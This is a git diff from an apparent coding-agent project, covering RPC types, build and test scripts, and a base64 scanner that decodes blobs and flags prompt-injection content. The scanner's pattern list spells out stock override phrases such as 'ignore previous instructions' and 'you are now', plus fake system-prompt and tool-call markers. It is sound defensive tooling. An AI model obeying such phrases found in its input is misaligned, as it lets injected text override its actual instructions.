+// ============================================================================
+// Extension UI Events (stdout)
+// ============================================================================
+
+/** Emitted when an extension needs user input */
+export type RpcExtensionUIRequest =
+	| { type: "extension_ui_request"; id: string; method: "select"; title: string; options: string[]; timeout?: number; allowMultiple?: boolean }
+	| { type: "extension_ui_request"; id: string; method: "confirm"; title: string; message: string; timeout?: number }
+	| {
+			type: "extension_ui_request";
+			id: string;
+			method: "input";
+			title: string;
+			placeholder?: string;
+			timeout?: number;
+	  }
+	| { type: "extension_ui_request"; id: string; method: "editor"; title: string; prefill?: string }
+	| {
+			type: "extension_ui_request";
+			id: string;
+			method: "notify";
+			message: string;
+			notifyType?: "info" | "warning" | "error";
+	  }
+	| {
+			type: "extension_ui_request";
+			id: string;
+			method: "setStatus";
+			statusKey: string;
+			statusText: string | undefined;
+	  }
+	| {
+			type: "extension_ui_request";
+			id: string;
+			method: "setWidget";
+			widgetKey: string;
+			widgetLines: string[] | undefined;
+			widgetPlacement?: "aboveEditor" | "belowEditor";
+	  }
+	| { type: "extension_ui_request"; id: string; method: "setTitle"; title: string }
+	| { type: "extension_ui_request"; id: string; method: "set_editor_text"; text: string };
+
+// ============================================================================
+// Extension UI Commands (stdin)
+// ============================================================================
+
+/** Response to an extension UI request */
+export type RpcExtensionUIResponse =
+	| { type: "extension_ui_response"; id: string; value: string }
+	| { type: "extension_ui_response"; id: string; values: string[] }
+	| { type: "extension_ui_response"; id: string; confirmed: boolean }
+	| { type: "extension_ui_response"; id: string; cancelled: true };
+
+// ============================================================================
+// Helper type for extracting command types
+// ============================================================================
+
+export type RpcCommandType = RpcCommand["type"];
diff --git a/packages/rpc-client/tsconfig.examples.json b/packages/rpc-client/tsconfig.examples.json
new file mode 100644
index 000000000..8453c546d
--- /dev/null
+++ b/packages/rpc-client/tsconfig.examples.json
@@ -0,0 +1,17 @@
+{
+  "compilerOptions": {
+    "target": "ES2024",
+    "module": "Node16",
+    "lib": ["ES2024"],
+    "strict": true,
+    "esModuleInterop": true,
+    "skipLibCheck": true,
+    "moduleResolution": "Node16",
+    "noEmit": true,
+    "types": ["node"],
+    "paths": {
+      "@gsd-build/rpc-client": ["./src/index.ts"]
+    }
+  },
+  "include": ["examples/**/*.ts"]
+}
diff --git a/packages/rpc-client/tsconfig.json b/packages/rpc-client/tsconfig.json
new file mode 100644
index 000000000..779b48aca
--- /dev/null
+++ b/packages/rpc-client/tsconfig.json
@@ -0,0 +1,24 @@
+{
+  "compilerOptions": {
+    "target": "ES2024",
+    "module": "Node16",
+    "lib": ["ES2024"],
+    "strict": true,
+    "esModuleInterop": true,
+    "skipLibCheck": true,
+    "forceConsistentCasingInFileNames": true,
+    "declaration": true,
+    "declarationMap": true,
+    "sourceMap": true,
+    "inlineSources": true,
+    "inlineSourceMap": false,
+    "moduleResolution": "Node16",
+    "resolveJsonModule": true,
+    "allowImportingTsExtensions": false,
+    "types": ["node"],
+    "outDir": "./dist",
+    "rootDir": "./src"
+  },
+  "include": ["src/**/*.ts"],
+  "exclude": ["node_modules", "dist", "**/*.d.ts", "src/**/*.d.ts"]
+}
diff --git a/pkg/package.json b/pkg/package.json
index 2cf3754fc..248f9d751 100644
--- a/pkg/package.json
+++ b/pkg/package.json
@@ -1,6 +1,6 @@
 {
   "name": "@glittercowboy/gsd",
-  "version": "2.41.0",
+  "version": "2.67.0",
   "piConfig": {
     "name": "gsd",
     "configDir": ".gsd"
diff --git a/repowise.db b/repowise.db
new file mode 100644
index 000000000..df702d28f
Binary files /dev/null and b/repowise.db differ
diff --git a/scripts/base64-scan.sh b/scripts/base64-scan.sh
new file mode 100755
index 000000000..e79428430
--- /dev/null
+++ b/scripts/base64-scan.sh
@@ -0,0 +1,242 @@
+#!/usr/bin/env bash
+# Base64 obfuscation scanner — extracts base64 blobs from changed files,
+# decodes them, and checks decoded content for prompt injection patterns.
+#
+# Catches obfuscated directives that would bypass docs-prompt-injection-scan.sh,
+# which only scans raw text in markdown files.
+#
+# Usage:
+#   scripts/base64-scan.sh                    # scan staged files (pre-commit mode)
+#   scripts/base64-scan.sh --diff origin/main # scan diff vs branch (CI mode)
+#   scripts/base64-scan.sh --file path        # scan a specific file
+#
+# Works on macOS (BSD grep) and Linux (GNU grep) — uses only ERE patterns.
+
+set -euo pipefail
+
+RED='\033[0;31m'
+YELLOW='\033[1;33m'
+CYAN='\033[0;36m'
+NC='\033[0m'
+
+IGNOREFILE=".base64scanignore"
+EXIT_CODE=0
+FINDINGS=0
+
+# Blobs shorter than this have too many false positives.
+# 40 base64 chars decodes to ~30 bytes — minimum length for a meaningful directive.
+MIN_BLOB_LEN=40
+
+# ── Prompt injection patterns to match against decoded content ────────
+# Format: "Label:::flags:::regex"
+# Mirrors the patterns in docs-prompt-injection-scan.sh but applied to
+# base64-decoded content across all file types.
+DECODED_PATTERNS=(
+  # System prompt markers
+  "System prompt marker:::i:::<system-prompt>"
+  "System prompt marker:::i:::<\|im_start\|>system"
+  "System prompt marker:::i:::\[SYSTEM\][[:space:]]*:"
+
+  # Role injection / override
+  "Role injection:::i:::you are now [a-z]"
+  "Instruction override:::i:::ignore (all )?previous instructions"
+  "Instruction override:::i:::ignore (all )?prior instructions"
+  "Instruction override:::i:::disregard (all )?(above|previous|prior)"
+  "Instruction override:::i:::forget (all )?(above|previous|prior) (instructions|context|rules)"
+  "Instruction override:::i:::new instructions:"
+  "Instruction override:::i:::override (all )?instructions"
+  "Instruction override:::i:::your new role is"
+  "Instruction override:::i:::from now on,? (you (are|will|must|should)|act as)"
+
+  # Hidden HTML directives
+  "Hidden directive::::::<!--[[:space:]]*(PROMPT|INSTRUCTION|SYSTEM|OVERRIDE|INJECT)[[:space:]]*:"
+  "Hidden directive::::::<!--[[:space:]]*(ignore|disregard|forget|override)"
+
+  # Tool / function call injection
+  "Tool call injection::::::(<tool_call>|<function_call>|<tool_use>)"
+  "Tool call injection::::::(<invoke|<function_calls>)"
+
+  # Nested encode/eval attempts
+  "Nested encoding:::i:::eval\(|exec\(|Function\("
+)
+
+# ── Ignore-file support ───────────────────────────────────────────────
+load_ignore_patterns() {
+  local ignore_patterns=()
+  if [[ -f "$IGNOREFILE" ]]; then
+    while IFS= read -r line; do
+      [[ -z "$line" || "$line" =~ ^# ]] && continue
+      ignore_patterns+=("$line")
+    done < "$IGNOREFILE"
+  fi
+  echo "${ignore_patterns[@]+"${ignore_patterns[@]}"}"
+}
+
+is_ignored() {
+  local file="$1" blob="$2"
+  local ignore_patterns
+  read -ra ignore_patterns <<< "$(load_ignore_patterns)"
+  for pattern in "${ignore_patterns[@]+"${ignore_patterns[@]}"}"; do
+    if [[ "$pattern" == *:* ]]; then
+      local ignore_file="${pattern%%:*}"
+      local ignore_regex="${pattern#*:}"
+      if [[ "$file" == $ignore_file ]] && echo "$blob" | grep -qiE "$ignore_regex" 2>/dev/null; then
+        return 0
+      fi
+    else
+      if echo "$blob" | grep -qiE "$pattern" 2>/dev/null; then
+        return 0
+      fi
+    fi
+  done
+  return 1
+}
+
+# ── File filtering ────────────────────────────────────────────────────
+# Scans all text file types — encoded instructions can hide anywhere.
+should_scan() {
+  local file="$1"
+  # Skip binary formats
+  case "$file" in
+    *.png|*.jpg|*.jpeg|*.gif|*.ico|*.woff|*.woff2|*.ttf|*.eot|\
+    *.zip|*.tar|*.gz|*.tgz|*.bz2|*.7z|*.rar|\
+    *.exe|*.dll|*.so|*.dylib|*.o|*.a|\
+    *.pdf|*.doc|*.docx|*.xls|*.xlsx|\
+    *.lock|package-lock.json|pnpm-lock.yaml|bun.lock|\
+    *.min.js|*.min.css|*.map|\
+    *.node|*.wasm)
+      return 1 ;;
+  esac
+  # Skip ignore/meta files
+  case "$file" in
+    .base64scanignore|.secretscanignore|.gitignore|.gitattributes|LICENSE*|CHANGELOG*)
+      return 1 ;;
+  esac
+  # Skip generated/vendor dirs
+  case "$file" in
+    node_modules/*|dist/*|coverage/*|.gsd/*)
+      return 1 ;;
+  esac
+  return 0
+}
+
+# ── File list and content ─────────────────────────────────────────────
+get_files() {
+  if [[ "${1:-}" == "--diff" ]]; then
+    local ref="${2:-HEAD}"
+    git diff --name-only --diff-filter=ACMR "$ref" 2>/dev/null || true
+  elif [[ "${1:-}" == "--file" ]]; then
+    echo "${2:-}"
+  else
+    git diff --cached --name-only --diff-filter=ACMR 2>/dev/null || true
+  fi
+}
+
+get_content() {
+  local file="$1"
+  if [[ "${SCAN_MODE:-staged}" == "staged" ]]; then
+    git show ":$file" 2>/dev/null || cat "$file" 2>/dev/null || true
+  else
+    cat "$file" 2>/dev/null || true
+  fi
+}
+
+# ── Decode and check a single blob ────────────────────────────────────
+check_blob() {
+  local file="$1" blob="$2" line_num="$3"
+
+  # Try to decode; skip if not valid base64
+  decoded=$(printf '%s' "$blob" | base64 --decode 2>/dev/null) || return 0
+
+  # Skip binary output: strip printable chars + whitespace; if anything remains it's binary
+  remainder=$(printf '%s' "$decoded" | tr -d '[:print:][:space:]')
+  [[ -n "$remainder" ]] && return 0
+
+  # Skip trivially short decoded content
+  [[ ${#decoded} -lt 8 ]] && return 0
+
+  # Check decoded content against each injection pattern
+  for entry in "${DECODED_PATTERNS[@]}"; do
+    label="${entry%%:::*}"
+    rest="${entry#*:::}"
+    flags="${rest%%:::*}"
+    regex="${rest#*:::}"
+
+    grep_flags="-E"
+    [[ "$flags" == *i* ]] && grep_flags="-Ei"
+
+    if printf '%s' "$decoded" | grep -q $grep_flags "$regex" 2>/dev/null; then
+      if is_ignored "$file" "$blob"; then
+        continue
+      fi
+
+      echo -e "${RED}[BASE64 ENCODED DIRECTIVE]${NC} ${YELLOW}${label}${NC}"
+      echo -e "  File:    ${CYAN}${file}:${line_num}${NC}"
+      echo "  Encoded: ${blob:0:60}..."
+      echo "  Decoded: $(printf '%s' "$decoded" | head -c 120)..."
+      echo ""
+      FINDINGS=$((FINDINGS + 1))
+      EXIT_CODE=1
+    fi
+  done
+}
+
+# ── Argument parsing ──────────────────────────────────────────────────
+SCAN_MODE="staged"
+FILES_ARG=()
+
+while [[ $# -gt 0 ]]; do
+  case "$1" in
+    --diff) SCAN_MODE="diff"; FILES_ARG=("--diff" "${2:-HEAD}"); shift 2 ;;
+    --file) SCAN_MODE="file"; FILES_ARG=("--file" "$2"); shift 2 ;;
+    *) shift ;;
+  esac
+done
+
+FILES=$(get_files "${FILES_ARG[@]+"${FILES_ARG[@]}"}")
+
+if [[ -z "$FILES" ]]; then
+  echo "base64-scan: no files to scan"
+  exit 0
+fi
+
+# ── Main scan ─────────────────────────────────────────────────────────
+while IFS= read -r file; do
+  [[ -z "$file" ]] && continue
+  should_scan "$file" || continue
+
+  content=$(get_content "$file")
+  [[ -z "$content" ]] && continue
+
+  line_num=0
+  while IFS= read -r line; do
+    line_num=$((line_num + 1))
+
+    # Skip data URI lines — legitimate image/font embedding
+    echo "$line" | grep -qE 'data:[a-z]+/[a-z+.-]+;base64,' && continue
+
+    # Extract base64 candidates from this line
+    blobs=$(printf '%s' "$line" | grep -oE "[A-Za-z0-9+/]{${MIN_BLOB_LEN},}={0,2}" 2>/dev/null || true)
+    [[ -z "$blobs" ]] && continue
+
+    while IFS= read -r blob; do
+      [[ -z "$blob" ]] && continue
+      check_blob "$file" "$blob" "$line_num"
+    done <<< "$blobs"
+  done <<< "$content"
+
+done <<< "$FILES"
+
+# ── Summary ───────────────────────────────────────────────────────────
+if [[ $FINDINGS -gt 0 ]]; then
+  echo -e "${RED}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
+  echo -e "${RED}Found $FINDINGS base64-encoded directive(s).${NC}"
+  echo -e "${RED}Encoded instructions are not permitted in source files.${NC}"
+  echo -e "${RED}Add exceptions to .base64scanignore if these are${NC}"
+  echo -e "${RED}false positives.${NC}"
+  echo -e "${RED}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
+else
+  echo "base64-scan: no encoded directives detected ✓"
+fi
+
+exit $EXIT_CODE
diff --git a/scripts/compile-tests.mjs b/scripts/compile-tests.mjs
new file mode 100644
index 000000000..3d6ac5e57
--- /dev/null
+++ b/scripts/compile-tests.mjs
@@ -0,0 +1,217 @@
+#!/usr/bin/env node
+/**
+ * Compile all TypeScript source + test files to dist-test/ using esbuild.
+ * Run compiled JS directly with node --test (no per-file TS overhead).
+ *
+ * Usage: node scripts/compile-tests.mjs
+ */
+
+import { cp, mkdir, readdir, readFile, writeFile } from 'node:fs/promises';
+import { existsSync, symlinkSync } from 'node:fs';
+import { createRequire } from 'node:module';
+import { join } from 'node:path';
+import { fileURLToPath } from 'node:url';
+
+const __dirname = fileURLToPath(new URL('.', import.meta.url));
+const ROOT = join(__dirname, '..');
+
+const require = createRequire(import.meta.url);
+const esbuild = require(join(ROOT, 'node_modules/esbuild'));
+
+// Recursively collect files by extension (skip node_modules, templates, etc.)
+// Directories to skip during file collection
+const SKIP_DIRS = new Set(['node_modules', 'templates', '__tests__', 'integration']);
+
+async function collectFiles(dir, exts = ['.ts', '.mjs']) {
+  const results = [];
+  let entries;
+  try {
+    entries = await readdir(dir, { withFileTypes: true });
+  } catch {
+    return results;
+  }
+  for (const entry of entries) {
+    if (SKIP_DIRS.has(entry.name)) continue;
+    const full = join(dir, entry.name);
+    if (entry.isDirectory()) {
+      results.push(...await collectFiles(full, exts));
+    } else if (
+      exts.some(ext => entry.name.endsWith(ext)) &&
+      !entry.name.endsWith('.d.ts')
+    ) {
+      results.push(full);
+    }
+  }
+  return results;
+}
+
+// Dirs to skip when copying assets (node_modules are never useful in dist-test)
+const ASSET_SKIP_DIRS = new Set(['node_modules', '__tests__', 'integration']);
+
+/**
+ * Recursively copy files from srcDir to destDir.
+ * Skips node_modules only. Copies everything: .ts/.tsx originals (for jiti),
+ * .mjs helpers, .md/.yaml/.json assets, etc.
+ * esbuild compiled .js output already lands in dist-test, so we just
+ * overlay the asset files on top.
+ */
+async function copyAssets(srcDir, destDir) {
+  let entries;
+  try {
+    entries = await readdir(srcDir, { withFileTypes: true });
+  } catch {
+    return; // directory doesn't exist, nothing to copy
+  }
+  for (const entry of entries) {
+    if (ASSET_SKIP_DIRS.has(entry.name)) continue;
+    const srcPath = join(srcDir, entry.name);
+    const destPath = join(destDir, entry.name);
+    if (entry.isDirectory()) {
+      await copyAssets(srcPath, destPath);
+    } else {
+      await mkdir(destDir, { recursive: true });
+      await cp(srcPath, destPath, { force: true });
+    }
+  }
+}
+
+async function main() {
+  const start = Date.now();
+
+  // Collect entry points from src/ and packages/*/src/
+  const srcFiles = await collectFiles(join(ROOT, 'src'));
+
+  const packagesDir = join(ROOT, 'packages');
+  const pkgEntries = await readdir(packagesDir, { withFileTypes: true });
+  const packageFiles = [];
+  for (const entry of pkgEntries) {
+    if (!entry.isDirectory()) continue;
+    const pkgSrc = join(packagesDir, entry.name, 'src');
+    packageFiles.push(...await collectFiles(pkgSrc));
+  }
+
+  // Also compile web/lib/ — some tests import from ../../web/lib/
+  const webLibFiles = await collectFiles(join(ROOT, 'web', 'lib'));
+
+  const entryPoints = [...srcFiles, ...packageFiles, ...webLibFiles];
+  console.log(`Compiling ${entryPoints.length} files to dist-test/...`);
+
+  // bundle:false transforms TypeScript but keeps import specifiers verbatim.
+  // We post-process the output to rewrite .ts → .js in import strings.
+  await esbuild.build({
+    entryPoints,
+    outdir: join(ROOT, 'dist-test'),
+    outbase: ROOT,
+    bundle: false,
+    format: 'esm',
+    platform: 'node',
+    target: 'node22',
+    sourcemap: 'inline',
+    packages: 'external',
+    logLevel: 'warning',
+  });
+
+  // Copy non-compiled assets from src/ to dist-test/src/ maintaining structure.
+  // Tests use import.meta.url to resolve sibling .md, .yaml, .json, .ts etc.
+  // Also copy original .ts files — jiti-based imports load .ts source directly.
+  const srcDir = join(ROOT, 'src');
+  const distSrcDir = join(ROOT, 'dist-test', 'src');
+  await copyAssets(srcDir, distSrcDir);
+  console.log('Copied non-TS assets and .ts source files to dist-test/src/');
+
+  // Copy packages/*/src/ assets as well
+  for (const entry of pkgEntries) {
+    if (!entry.isDirectory()) continue;
+    const pkgSrc = join(packagesDir, entry.name, 'src');
+    const pkgDistSrc = join(ROOT, 'dist-test', 'packages', entry.name, 'src');
+    await copyAssets(pkgSrc, pkgDistSrc);
+  }
+
+  // Copy web/lib/ assets (tests import from ../../web/lib/ relative to dist-test/src/tests/)
+  await copyAssets(join(ROOT, 'web', 'lib'), join(ROOT, 'dist-test', 'web', 'lib'));
+
+  // Copy web/components/ assets (xterm-theme test reads shell-terminal.tsx via import.meta.dirname)
+  await copyAssets(join(ROOT, 'web', 'components'), join(ROOT, 'dist-test', 'web', 'components'));
+
+  // Copy scripts/ non-TS files (.cjs etc) — some tests require() scripts directly
+  await copyAssets(join(ROOT, 'scripts'), join(ROOT, 'dist-test', 'scripts'));
+
+  // Copy root package.json — some tests read it to check version/engines fields
+  await cp(join(ROOT, 'package.json'), join(ROOT, 'dist-test', 'package.json'), { force: true });
+
+  // Copy root dist/ into dist-test/dist/ — some tests compute projectRoot as
+  // 3 levels up from dist-test/src/tests/ which lands at dist-test/, then
+  // import from dist/mcp-server.js etc.
+  const rootDistDir = join(ROOT, 'dist');
+  const distTestDistDir = join(ROOT, 'dist-test', 'dist');
+  await copyAssets(rootDistDir, distTestDistDir);
+
+  // Post-process: rewrite .ts import specifiers to .js in all compiled JS files.
+  // esbuild with bundle:false preserves original specifiers; Node can't load .ts.
+  const compiledJsFiles = await collectFiles(join(ROOT, 'dist-test'), ['.js']);
+  // Regex matches .ts in from/import() strings but not sourceMappingURL comments
+  const tsImportRe = /(from\s+["'])(\.\.?\/[^"']*?)\.ts(["'])/g;
+  const tsDynImportRe = /(import\(["'])(\.\.?\/[^"']*?)\.ts(["'])\)/g;
+
+  let rewritten = 0;
+  await Promise.all(compiledJsFiles.map(async (file) => {
+    const src = await readFile(file, 'utf-8');
+    const out = src
+      .replace(tsImportRe,   (_, a, b, c) => `${a}${b}.js${c}`)
+      .replace(tsDynImportRe, (_, a, b, c) => `${a}${b}.js${c})`);
+    if (out !== src) {
+      await writeFile(file, out, 'utf-8');
+      rewritten++;
+    }
+  }));
+  if (rewritten > 0) {
+    console.log(`Rewrote .ts → .js imports in ${rewritten} files`);
+  }
+
+  // Remove stale compiled test files: dist-test entries whose source no longer exists
+  // in a non-integration source directory (e.g. test moved to integration/).
+  // Only cleans *.test.js and *.test.ts files to avoid touching non-test outputs.
+  const { rm } = await import('node:fs/promises');
+  const { existsSync } = await import('node:fs');
+  const testDirsToClean = [
+    [join(ROOT, 'dist-test', 'src', 'tests'), join(ROOT, 'src', 'tests')],
+    [join(ROOT, 'dist-test', 'src', 'resources', 'extensions', 'gsd', 'tests'),
+     join(ROOT, 'src', 'resources', 'extensions', 'gsd', 'tests')],
+  ];
+  let staleCleaned = 0;
+  for (const [distDir, srcDir] of testDirsToClean) {
+    let distEntries;
+    try { distEntries = await readdir(distDir, { withFileTypes: true }); } catch { continue; }
+    for (const entry of distEntries) {
+      if (!entry.isFile()) continue;
+      if (!entry.name.match(/\.test\.(js|ts)$/)) continue;
+      const stem = entry.name.replace(/\.(js|ts)$/, '');
+      // Source could be .ts or .mjs (esbuild compiles both to .js)
+      const hasTsSrc = existsSync(join(srcDir, stem + '.ts'));
+      const hasMjsSrc = existsSync(join(srcDir, stem + '.mjs'));
+      if (!hasTsSrc && !hasMjsSrc) {
+        await rm(join(distDir, entry.name));
+        staleCleaned++;
+      }
+    }
+  }
+  if (staleCleaned > 0) {
+    console.log(`Removed ${staleCleaned} stale compiled test files from dist-test/`);
+  }
+
+  // Ensure dist-test/node_modules exists so resource-loader.ts (which computes
+  // packageRoot from import.meta.url) resolves gsdNodeModules to a real path.
+  // Without this, initResources creates dangling symlinks in test environments.
+  const distNodeModules = join(ROOT, 'dist-test', 'node_modules');
+  if (!existsSync(distNodeModules)) {
+    symlinkSync(join(ROOT, 'node_modules'), distNodeModules);
+  }
+
+  const elapsed = ((Date.now() - start) / 1000).toFixed(2);
+  console.log(`Done in ${elapsed}s`);
+}
+
+main().catch(err => {
+  console.error(err);
+  process.exit(1);
+});
diff --git a/scripts/dist-test-resolve.mjs b/scripts/dist-test-resolve.mjs
new file mode 100644
index 000000000..a5d94da11
--- /dev/null
+++ b/scripts/dist-test-resolve.mjs
@@ -0,0 +1,46 @@
+/**
+ * Minimal Node.js import hook for running tests from dist-test/.
+ *
+ * esbuild with bundle:false preserves import specifiers verbatim, so compiled
+ * .js files still import '../foo.ts'. This hook redirects those to '.js' so
+ * Node can find the compiled output.
+ *
+ * Also redirects @gsd bare imports to their compiled counterparts in dist-test.
+ */
+
+import { fileURLToPath, pathToFileURL } from 'node:url';
+import { existsSync } from 'node:fs';
+import { join } from 'node:path';
+
+// dist-test root — everything compiled lands here
+const DIST_TEST = new URL('../dist-test/', import.meta.url).href;
+
+// Absolute paths to compiled @gsd/* entry points
+const GSD_ALIASES = {
+  '@gsd/pi-coding-agent': new URL('../dist-test/packages/pi-coding-agent/src/index.js', import.meta.url).href,
+  '@gsd/pi-ai/oauth':     new URL('../dist-test/packages/pi-ai/src/utils/oauth/index.js', import.meta.url).href,
+  '@gsd/pi-ai':           new URL('../dist-test/packages/pi-ai/src/index.js', import.meta.url).href,
+  '@gsd/pi-agent-core':   new URL('../dist-test/packages/pi-agent-core/src/index.js', import.meta.url).href,
+  '@gsd/pi-tui':          new URL('../dist-test/packages/pi-tui/src/index.js', import.meta.url).href,
+  '@gsd/native':          new URL('../dist-test/packages/native/src/index.js', import.meta.url).href,
+};
+
+export function resolve(specifier, context, nextResolve) {
+  // 1. @gsd/* bare imports → compiled dist-test counterpart
+  if (specifier in GSD_ALIASES) {
+    return nextResolve(GSD_ALIASES[specifier], context);
+  }
+
+  // 2. .ts relative imports inside dist-test → .js
+  if (
+    specifier.endsWith('.ts') &&
+    (specifier.startsWith('./') || specifier.startsWith('../')) &&
+    context.parentURL &&
+    context.parentURL.startsWith(DIST_TEST)
+  ) {
+    const jsSpecifier = specifier.slice(0, -3) + '.js';
+    return nextResolve(jsSpecifier, context);
+  }
+
+  return nextResolve(specifier, context);
+}
diff --git a/scripts/ensure-workspace-builds.cjs b/scripts/ensure-workspace-builds.cjs
index ddbba3488..10a6638e4 100644
--- a/scripts/ensure-workspace-builds.cjs
+++ b/scripts/ensure-workspace-builds.cjs
@@ -3,56 +3,119 @@
  * ensure-workspace-builds.cjs
  *
  * Checks whether workspace packages have been compiled (dist/ exists with
- * index.js). If any are missing, runs the build for those packages.
+ * index.js) and that the build is not stale (no src/ file newer than dist/).
+ * If any are missing or stale, runs the build for those packages.
  *
  * Designed for the postinstall hook so that `npm install` in a fresh clone
- * produces a working runtime without a manual `npm run build` step.
+ * produces a working runtime without a manual `npm run build` step. Also
+ * catches the common case where `git pull` updates package sources but the
+ * old dist/ remains, causing TypeScript type errors.
  *
  * Skipped in CI (where the full build pipeline handles this) and when
  * installing as an end-user dependency (no packages/ directory).
  */
-const { existsSync } = require('fs')
+const { existsSync, statSync, readdirSync } = require('fs')
 const { resolve, join } = require('path')
 const { execSync } = require('child_process')
 
-const root = resolve(__dirname, '..')
-const packagesDir = join(root, 'packages')
+/**
+ * Returns the most recent mtime (ms) of any .ts file under dir, recursively.
+ * Returns 0 if no .ts files found.
+ */
+function newestSrcMtime(dir) {
+  if (!existsSync(dir)) return 0
+  let newest = 0
+  for (const entry of readdirSync(dir, { withFileTypes: true })) {
+    if (entry.name === 'node_modules') continue
+    const full = join(dir, entry.name)
+    if (entry.isDirectory()) {
+      newest = Math.max(newest, newestSrcMtime(full))
+    } else if (entry.isFile() && entry.name.endsWith('.ts')) {
+      newest = Math.max(newest, statSync(full).mtimeMs)
+    }
+  }
+  return newest
+}
 
-// Skip if packages/ doesn't exist (published tarball / end-user install)
-if (!existsSync(packagesDir)) process.exit(0)
+/**
+ * Detects workspace packages whose dist/ is missing or stale.
+ *
+ * Missing dist/index.js is always reported (the package won't work at all).
+ *
+ * Staleness (src/ newer than dist/) is ONLY checked when a .git directory
+ * exists at root — indicating a development clone. In npm tarball installs,
+ * file timestamps are unreliable (npm sets all files to a canonical date,
+ * but extraction ordering can cause src/ to appear 1-2 seconds newer than
+ * dist/). Attempting to rebuild in that scenario is dangerous: devDependencies
+ * (including TypeScript) are not installed, and any globally-installed tsc
+ * may produce broken output that overwrites the known-good dist/.
+ *
+ * @param {string} root    Project root directory
+ * @param {string[]} packages  Package directory names to check
+ * @returns {string[]} Package names that need rebuilding
+ */
+function detectStalePackages(root, packages) {
+  const packagesDir = join(root, 'packages')
+  const isDevClone = existsSync(join(root, '.git'))
 
-// Skip in CI — the pipeline runs `npm run build` explicitly
-if (process.env.CI === 'true' || process.env.CI === '1') process.exit(0)
+  const stale = []
+  for (const pkg of packages) {
+    const distIndex = join(packagesDir, pkg, 'dist', 'index.js')
+    if (!existsSync(distIndex)) {
+      stale.push(pkg)
+      continue
+    }
+    // Only check src vs dist timestamps in development clones.
+    // In npm tarball installs, timestamps are unreliable and rebuilding
+    // without devDependencies can corrupt the pre-built dist/ (#2877).
+    if (isDevClone) {
+      const distMtime = statSync(distIndex).mtimeMs
+      const srcMtime = newestSrcMtime(join(packagesDir, pkg, 'src'))
+      if (srcMtime > distMtime) {
+        stale.push(pkg)
+      }
+    }
+  }
+  return stale
+}
 
-// Workspace packages that need dist/index.js at runtime.
-// Order matters: dependencies must build before dependents.
-const WORKSPACE_PACKAGES = [
-  'native',
-  'pi-tui',
-  'pi-ai',
-  'pi-agent-core',
-  'pi-coding-agent',
-]
+if (require.main === module) {
+  const root = resolve(__dirname, '..')
+  const packagesDir = join(root, 'packages')
 
-const missing = []
-for (const pkg of WORKSPACE_PACKAGES) {
-  const distIndex = join(packagesDir, pkg, 'dist', 'index.js')
-  if (!existsSync(distIndex)) {
-    missing.push(pkg)
+  // Skip if packages/ doesn't exist (published tarball / end-user install)
+  if (!existsSync(packagesDir)) process.exit(0)
+
+  // Skip in CI — the pipeline runs `npm run build` explicitly
+  if (process.env.CI === 'true' || process.env.CI === '1') process.exit(0)
+
+  // Workspace packages that need dist/index.js at runtime.
+  // Order matters: dependencies must build before dependents.
+  const WORKSPACE_PACKAGES = [
+    'native',
+    'pi-tui',
+    'pi-ai',
+    'pi-agent-core',
+    'pi-coding-agent',
+  ]
+
+  const stale = detectStalePackages(root, WORKSPACE_PACKAGES)
+
+  if (stale.length === 0) process.exit(0)
+
+  process.stderr.write(`  Building ${stale.length} workspace package(s) with stale or missing dist/: ${stale.join(', ')}\n`)
+
+  for (const pkg of stale) {
+    const pkgDir = join(packagesDir, pkg)
+    try {
+      // execSync is safe here: the command is a hardcoded string, not user input
+      execSync('npm run build', { cwd: pkgDir, stdio: 'pipe' })
+      process.stderr.write(`  ✓ ${pkg}\n`)
+    } catch (err) {
+      process.stderr.write(`  ✗ ${pkg} build failed: ${err.message}\n`)
+      // Non-fatal — the user can run `npm run build` manually
+    }
   }
 }
 
-if (missing.length === 0) process.exit(0)
-
-process.stderr.write(`  Building ${missing.length} workspace package(s) missing dist/: ${missing.join(', ')}\n`)
-
-for (const pkg of missing) {
-  const pkgDir = join(packagesDir, pkg)
-  try {
-    execSync('npm run build', { cwd: pkgDir, stdio: 'pipe' })
-    process.stderr.write(`  ✓ ${pkg}\n`)
-  } catch (err) {
-    process.stderr.write(`  ✗ ${pkg} build failed: ${err.message}\n`)
-    // Non-fatal — the user can run `npm run build` manually
-  }
-}
+module.exports = { newestSrcMtime, detectStalePackages }
diff --git a/scripts/parallel-monitor.mjs b/scripts/parallel-monitor.mjs
new file mode 100755
index 000000000..b29109682
--- /dev/null
+++ b/scripts/parallel-monitor.mjs
@@ -0,0 +1,852 @@
+#!/usr/bin/env node
+/**
+ * GSD Parallel Worker Monitor
+ * 
+ * Real-time TUI dashboard for monitoring parallel GSD auto-mode workers.
+ * Zero dependencies — uses raw ANSI escape codes, Node.js builtins only.
+ * 
+ * Usage:
+ *   node scripts/parallel-monitor.mjs                    # live dashboard, 5s refresh
+ *   node scripts/parallel-monitor.mjs --interval 3       # faster refresh
+ *   node scripts/parallel-monitor.mjs --once              # single snapshot, then exit
+ *   node scripts/parallel-monitor.mjs --heal              # auto-respawn dead workers
+ *   node scripts/parallel-monitor.mjs --heal --heal-retries 5 --heal-cooldown 60
+ * 
+ * Options:
+ *   --interval <sec>      Refresh interval in seconds (default: 5)
+ *   --once                Render once and exit (useful for scripting/piping)
+ *   --heal                Auto-respawn dead workers (opt-in, off by default)
+ *   --heal-retries <n>    Max respawn attempts per worker (default: 3)
+ *   --heal-cooldown <sec> Seconds between respawn attempts (default: 30)
+ *   --dir <path>          Status file directory (default: .gsd/parallel)
+ *   --root <path>         Project root (default: cwd)
+ * 
+ * Data sources:
+ *   .gsd/parallel/M0xx.status.json  — heartbeat, cost, state (written by orchestrator)
+ *   .gsd/worktrees/M0xx/.gsd/auto.lock — current unit type + ID (written by worker)
+ *   .gsd/worktrees/M0xx/.gsd/gsd.db — task/slice completion (SQLite, queried via cli)
+ *   .gsd/parallel/M0xx.stdout.log — NDJSON events (cost extraction, notify messages)
+ *   .gsd/parallel/M0xx.stderr.log — error surfacing
+ * 
+ * Health indicators:
+ *   ● green  — PID alive, fresh heartbeat (<30s)
+ *   ● green  — PID alive, heartbeat stale (respawned worker, file mtime used as proxy)
+ *   ○ red    — PID dead
+ * 
+ * Self-healing (--heal):
+ *   When a dead worker is detected, the monitor writes a temp shell script and launches
+ *   a new headless auto-mode process in the worker's worktree with the correct env vars.
+ *   Cooldown prevents rapid respawn loops. Gives up after --heal-retries consecutive 
+ *   failures. Resets retry count when a worker comes back alive.
+ */
+
+import fs from 'node:fs';
